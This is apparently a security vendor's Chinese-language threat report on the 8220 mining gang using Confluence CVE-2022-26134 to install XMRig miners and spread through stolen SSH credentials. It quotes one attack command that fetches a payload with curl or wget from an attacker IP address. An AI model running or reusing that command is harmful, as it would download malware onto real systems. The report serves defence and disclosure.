進擊的“8220”！深信服捕獲8220挖礦團伙使用最新Confluence高危漏洞發起攻擊

事件概要

近日爆發的Atlassian Confluence OGNL注入命令執行漏洞（CVE-2022-26134）漏洞等級為嚴重，該漏洞CVSS3.1評分：9.8。攻擊者可利用該漏洞在未授權的情況下，構造惡意資料執行OGNL表示式注入攻擊，最終導致遠端程式碼執行。

深信服深瞻情報實驗室在監控該漏洞的在野利用中，發現多個黑產組織已經將其武器化，試圖利用該漏洞進行入侵攻擊，若攻擊成功則會在使用者網路中安裝後門或挖礦病毒。

8220挖礦團伙率先利用漏洞發起攻擊

“8220”是一個長期活躍並且擅長使用漏洞進行攻擊並部署挖礦程式的黑產團伙，該團伙早期使用Docker映象傳播挖礦木馬，後來逐步透過Redis和Apache等流行服務的各種n-day漏洞利用進行傳播。該團伙最終會在受感染主機上下載並執行挖礦程式和Tsunami殭屍網路，並進一步獲得永續性，嘗試橫向移動，以及痕跡清理。

8220挖礦團伙暫時並未將此漏洞整合到惡意軟體的橫向模組，所以利用CVE-2022-26134攻擊的目標物件主要為存在漏洞且對外網對映的Confluence伺服器。

本次8220挖礦木馬（Linux）使用CVE-2022-26134進行攻擊的流程如下所示：

8220挖礦團伙精心構造含有CVE-2022-26134漏洞利用的HTTP請求作為初始攻擊，並使用Java執行功能執行命令，將惡意負載下載到受害者的機器上，本次8220的攻擊特徵如下：

curl -fsSL http://192.210.200.66:1234/xmss||wget -q -O - http://192.210.200.66:1234/xmss

該病毒（localgo函式）會蒐集使用者ssh埠、使用者列表、主機列表、登入金鑰憑證，將其用於嘗試登入其他機器（導致橫向傳播），以下載和安裝http://$url/xms：

8220病毒會進一步利用使用者的伺服器/主機進行非法挖礦，下載的礦機是利用最新版本的開源XMRig挖礦專案編譯，版本編號為6.17.0，挖礦程式的執行會耗盡受害系統資源：

礦工錢包地址如下：

在持續監控8220挖礦團伙過程中發現，該團伙在橫向移動的模組中除了使用掃描工具masscan，還新增了spirit駭客工具，用於在內網進行資產掃描和入侵，下載的px中儲存了爆破攻擊的16073個弱密碼。

總結

漏洞利用作為黑產發起攻擊的重要手段，0day或Nday漏洞已經成為惡意軟體的常用套路，惡意軟體為了更有效和廣泛的傳播，會在漏洞被披露的第一時間更新進武器庫。Atlassian Confluence OGNL注入命令執行漏洞利用攻擊再次證明這一點，除了8220挖礦木馬，我們還捕獲到H2Miner、Mirai等病毒也同樣使用了此漏洞發起攻擊，建議廣大使用者提高警惕，提前做好應對！